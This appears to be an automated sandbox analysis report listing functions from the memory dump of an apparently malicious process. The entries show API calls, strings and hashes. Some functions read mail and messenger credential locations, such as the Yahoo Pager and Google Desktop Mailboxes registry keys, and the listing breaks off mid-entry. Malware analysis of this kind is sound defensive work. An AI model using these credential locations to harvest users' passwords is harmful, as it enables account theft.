                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                    • String ID: Personalities
                    • API String ID: 2103853322-4287407858
                    • Opcode ID: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                    • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                    • Opcode Fuzzy Hash: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                    • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                    Function 00410863 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMON
                    Download Yara Rule
                    APIs
                    • UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                    • UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                    • memcpy.MSVCRT ref: 004108C3
                    Strings
                    • 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 00410875
                    • 00000000-0000-0000-0000-000000000000, xrefs: 00410882
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: FromStringUuid$memcpy
                    • String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
                    • API String ID: 2859077140-3316789007
                    • Opcode ID: 1bd0dfdd33b944ccaa92fc0adafc19938dd855d0ba2d869dfbea71798e3d1944
                    • Instruction ID: 2d05171d55a2aa7530ad5e51965ca7b7e6a6868cf32f938cfe5ee3e9f977ce1c
                    • Opcode Fuzzy Hash: 1bd0dfdd33b944ccaa92fc0adafc19938dd855d0ba2d869dfbea71798e3d1944
                    • Instruction Fuzzy Hash: BD016D7690412DBADF01AE95CD40EEB7BACEF49354F044123FD15E6150E6B8EA84CBE4
                    Function 00444551 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 51registryCOMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 00444573
                      • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                      • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: CloseOpenQueryValuememset
                    • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                    • API String ID: 1830152886-1703613266
                    • Opcode ID: baf3755ad005164e852b951840563bf60568ed10c800e15668adf960084471f0
                    • Instruction ID: e49b40feb516e52fd010a51085a75c79e183d02607987ed0dc43077d9115a6c0
                    • Opcode Fuzzy Hash: baf3755ad005164e852b951840563bf60568ed10c800e15668adf960084471f0
                    • Instruction Fuzzy Hash: E80196B6A00118BBEF11AA569D01F9A777CDF90355F1000A6FF08F2212E6749F599698
                    Function 0043D62C Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 224COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset
                    • String ID: H
                    • API String ID: 2221118986-2852464175
                    • Opcode ID: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                    • Instruction ID: 41a1901620add3bbd0c629c105807ca0f7ae5b253a5bd6696a221ab72d79fc9a
                    • Opcode Fuzzy Hash: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                    • Instruction Fuzzy Hash: C0916C75D00219DFDF24DFA5D881AEEB7B5FF48300F10849AE959AB201E734AA45CF98
                    Function 0042563B Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 176COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy
                    • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                    • API String ID: 3510742995-3170954634
                    • Opcode ID: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                    • Instruction ID: e987c9c84479fff69dc62f11a90029b17cbd8b5ab9a96ddea988199e68ce63eb
                    • Opcode Fuzzy Hash: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                    • Instruction Fuzzy Hash: 2361C235B006259FCB04DF68E484BAEFBF1BF44314F55809AE904AB352D738E980CB98
                    Function 00414625 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 132COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy$memset
                    • String ID: winWrite1$winWrite2
                    • API String ID: 438689982-3457389245
                    • Opcode ID: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                    • Instruction ID: c2532708ffcca3880dfc28061b61c902a2330187b6102c2a8a28e688d44e82e0
                    • Opcode Fuzzy Hash: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                    • Instruction Fuzzy Hash: 86418072A00209EBDF00DF95CC85BDE7775FF85315F14411AE924A7280D778EAA4CB99
                    Function 004144FD Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 109COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpymemset
                    • String ID: winRead
                    • API String ID: 1297977491-2759563040
                    • Opcode ID: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                    • Instruction ID: 3ec02e552038d814b148e8dc6d2e6fcfdb14063e9eab1ef980803e4d567ed084
                    • Opcode Fuzzy Hash: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                    • Instruction Fuzzy Hash: DC31C372A00218ABDF10DF69CC46ADF776AEF84314F184026FE14DB241D334EE948BA9
                    Function 00449550 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 85COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpymemset
                    • String ID: gj
                    • API String ID: 1297977491-4203073231
                    • Opcode ID: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                    • Instruction ID: 902d5c3a1247e7abcff0c4a84da7d54d3a467651d8a5431b25503c8ae0e770b6
                    • Opcode Fuzzy Hash: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                    • Instruction Fuzzy Hash: AF216A733443402BF7259A3ACC41B5B775DDFCA318F16041EF68A8B342E67AEA058715
                    Function 004090B0 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                    Download Yara Rule
                    APIs
                    • GetParent.USER32(?), ref: 004090C2
                    • GetWindowRect.USER32(?,?), ref: 004090CF
                    • GetClientRect.USER32(00000000,?), ref: 004090DA
                    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                    • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: Window$Rect$ClientParentPoints
                    • String ID:
                    • API String ID: 4247780290-0
                    • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                    • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                    • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                    • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                    Function 00410777 Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00407107: memset.MSVCRT ref: 00407127
                      • Part of subcall function 00407107: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040713A
                      • Part of subcall function 00407107: _strcmpi.MSVCRT ref: 0040714C
                    • SetBkMode.GDI32(?,00000001), ref: 0041079E
                    • GetSysColor.USER32(00000005), ref: 004107A6
                    • SetBkColor.GDI32(?,00000000), ref: 004107B0
                    • SetTextColor.GDI32(?,00C00000), ref: 004107BE
                    • GetSysColorBrush.USER32(00000005), ref: 004107C6
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: Color$BrushClassModeNameText_strcmpimemset
                    • String ID:
                    • API String ID: 2775283111-0
                    • Opcode ID: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                    • Instruction ID: 687cb18978465a3feaaa07aa3b8de37e8775815fe2b8de28c5581ef0bdca0d30
                    • Opcode Fuzzy Hash: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                    • Instruction Fuzzy Hash: AAF03135101109BBCF112FA5DC49ADE3F25EF05711F14812AFA25A85F1CBB5A990DF58
                    Function 0041479C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 96COMMON
                    Download Yara Rule
                    APIs
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004147CE
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                    • String ID: winSeekFile$winTruncate1$winTruncate2
                    • API String ID: 885266447-2471937615
                    • Opcode ID: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                    • Instruction ID: 76c2d8f9c45a6ab14154b13c081d04d7f34c1e3f6c53ca943db3ce1179081271
                    • Opcode Fuzzy Hash: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                    • Instruction Fuzzy Hash: 5C313175600700AFE720AF65CC41EABB7E8FB88715F104A2EF965932D1D734E8808B29
                    Function 0040E103 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: _strcmpi$_mbscpy
                    • String ID: smtp
                    • API String ID: 2625860049-60245459
                    • Opcode ID: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                    • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                    • Opcode Fuzzy Hash: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                    • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                    Function 0040821D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61registryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                    • memset.MSVCRT ref: 00408258
                      • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082A6
                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082C3
                    Strings
                    • Software\Google\Google Desktop\Mailboxes, xrefs: 00408230
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: Close$EnumOpenmemset
                    • String ID: Software\Google\Google Desktop\Mailboxes
                    • API String ID: 2255314230-2212045309
                    • Opcode ID: b9c6ba0a09f39c77023865a56f43d31249d27d4aeb116fb61def55debc704f1d
                    • Instruction ID: e7ff4aa50d33639bacb2d5000aefce928628a80d8311d3545e17288fa3d3d8ee
                    • Opcode Fuzzy Hash: b9c6ba0a09f39c77023865a56f43d31249d27d4aeb116fb61def55debc704f1d
                    • Instruction Fuzzy Hash: 9D118F72408345ABD710EE51DC01EABBBACEFD0344F04093EBD9491091EB75D958C6AA
                    Function 0040C26C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43windowCOMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 0040C28C
                    • SetFocus.USER32(?,?), ref: 0040C314
                      • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: FocusMessagePostmemset
                    • String ID: S_@$l
                    • API String ID: 3436799508-4018740455
                    • Opcode ID: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                    • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                    • Opcode Fuzzy Hash: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                    • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                    Function 0040929C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37COMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 004092C0
                    • GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                    • _mbscpy.MSVCRT ref: 004092FC
                    Strings
                    • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 004092A9
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: PrivateProfileString_mbscpymemset
                    • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>
                    • API String ID: 408644273-3424043681
                    • Opcode ID: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                    • Instruction ID: a8dcbc571cfa5336c44be942190f1d9429afcf202dd246abef1f156f809eb6de
                    • Opcode Fuzzy Hash: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                    • Instruction Fuzzy Hash: 02F0E0725011A83AEB1297549C02FCA779CCB0D307F1440A2B749E20C1D5F8DEC44A9D
                    Function 00407482 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 35COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: _mbscpy
                    • String ID: C^@$X$ini
                    • API String ID: 714388716-917056472
                    • Opcode ID: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                    • Instruction ID: 848b4a5d233ab05c703a0d630411b91f0640a461eb42b4d170138ac17b774cf5
                    • Opcode Fuzzy Hash: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                    • Instruction Fuzzy Hash: F601B2B1D002489FDB50DFE9D9856CEBFF4AB08318F10802AE415F6240EB7895458F59
                    Function 00401000 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                      • Part of subcall function 00406FC7: _mbscpy.MSVCRT ref: 00407011
                    • CreateFontIndirectA.GDI32(?), ref: 0040101F
                    • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                    • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                    • String ID: MS Sans Serif
                    • API String ID: 3492281209-168460110
                    • Opcode ID: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                    • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                    • Opcode Fuzzy Hash: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                    • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                    Function 00407107 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: ClassName_strcmpimemset
                    • String ID: edit
                    • API String ID: 275601554-2167791130
                    • Opcode ID: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                    • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                    • Opcode Fuzzy Hash: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                    • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                    Function 0040759E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20stringCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: strlen$_mbscat
                    • String ID: 3CD
                    • API String ID: 3951308622-1938365332
                    • Opcode ID: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                    • Instruction ID: 1107c6f19d6a4433d5fdc1d3c5cfb72f3531f1d81a70b052f8a244d3c085287a
                    • Opcode Fuzzy Hash: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                    • Instruction Fuzzy Hash: 1BD0A77390C2603AE61566167C42F8E5BC1CFD433AB15081FF408D1281DA3DE881809D
                    Function 004326AD Relevance: 6.5, APIs: 3, Strings: 1, Instructions: 475COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset
                    • String ID: rows deleted
                    • API String ID: 2221118986-571615504
                    • Opcode ID: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                    • Instruction ID: 17dfb349c3cd8fc2c2490db290532cf881f14abfa8d6012d9aa572d9710d7201
                    • Opcode Fuzzy Hash: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                    • Instruction Fuzzy Hash: D5028171E00218AFDF14DFA5D981AEEBBB5FF08314F14005AF914B7291D7B9AA41CBA4
                    Function 0044338B Relevance: 6.3, APIs: 5, Instructions: 81COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??2@$memset
                    • String ID:
                    • API String ID: 1860491036-0
                    • Opcode ID: ebb40f1ae782bd27a9c9ebb170ff663f9279e29e1a89e233aa61efeea33ca50f
                    • Instruction ID: bd2fcbe50e3d5b8ec1466eca70e60fda3411ba7e10a355e4f398212a99dd52d4
                    • Opcode Fuzzy Hash: ebb40f1ae782bd27a9c9ebb170ff663f9279e29e1a89e233aa61efeea33ca50f
                    • Instruction Fuzzy Hash: 973162B09107508FE751DF3A8845A16FBE4FF80B05F25486FD549CB2A2E779E5408B19
                    Function 0040D2A3 Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$memcpy
                    • String ID:
                    • API String ID: 368790112-0
                    • Opcode ID: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                    • Instruction ID: 358c417c53aa398974aae77e4359fd90ac0a4dba5340dfd55ca125e4bb0c9b0b
                    • Opcode Fuzzy Hash: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                    • Instruction Fuzzy Hash: 8E01D8B5A40B406BE235AE25CC03F2AB3A8DF91714F400A2EF692676C1D7B8F509915D
                    Function 004257AA Relevance: 6.2, APIs: 4, Instructions: 181COMMON
                    Download Yara Rule
                    APIs
                    • __allrem.LIBCMT ref: 00425850
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00425885
                    • __allrem.LIBCMT ref: 00425933
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042597B
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                    • String ID:
                    • API String ID: 1992179935-0
                    • Opcode ID: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                    • Instruction ID: 2fc5b562d87482ee0bf7138f77baf3e4365ffd42061eb2d4d5abd72185a9e376
                    • Opcode Fuzzy Hash: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                    • Instruction Fuzzy Hash: C96180B1A00A29DFCF149B64D840AAEB7B1FF45320F68815AE548AB391D7389D81CF19
                    Function 0042C52C Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 165COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    • too many SQL variables, xrefs: 0042C6FD
                    • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset
                    • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                    • API String ID: 2221118986-515162456
                    • Opcode ID: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                    • Instruction ID: 69d39437184f158b69242413db2932325e78deb4f0df02558d14bae7a1bb2b74
                    • Opcode Fuzzy Hash: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                    • Instruction Fuzzy Hash: 93518B31B00626EFDB29DF68D481BEEB7A4FF09304F50016BE811A7251D779AD51CB88
                    Function 00402624 Relevance: 6.1, APIs: 4, Instructions: 127COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
                    • memset.MSVCRT ref: 004026AD
                      • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                      • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                      • Part of subcall function 004108E5: memcpy.MSVCRT ref: 00410961
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
                    • LocalFree.KERNEL32(?), ref: 004027A6
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: ByteCharFromMultiStringUuidWide$FreeLocalQueryValuememcpymemset
                    • String ID:
                    • API String ID: 1593657333-0
                    • Opcode ID: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                    • Instruction ID: aa14e43d8b473801bf9d2631992dc1640396fa6537153de3cc175e43cdbeb3f4
                    • Opcode Fuzzy Hash: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                    • Instruction Fuzzy Hash: 0B4183B1408384BFD711DB60CD85AAB77D8AF89314F044A3FF998A31C1D679DA44CB5A
                    Function 0040B5E5 Relevance: 6.1, APIs: 4, Instructions: 114stringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT ref: 00409E0E
                      • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT ref: 00409ED5
                    • strlen.MSVCRT ref: 0040B60B
                    • atoi.MSVCRT ref: 0040B619
                    • _mbsicmp.MSVCRT ref: 0040B66C
                    • _mbsicmp.MSVCRT ref: 0040B67F
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: _mbsicmp$??2@??3@atoistrlen
                    • String ID:
                    • API String ID: 4107816708-0
                    • Opcode ID: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                    • Instruction ID: e44d10e2ba05df3f3c4ea20365ac2b40f6a529c5f902ff1350b2aa0f2f7d2ce1
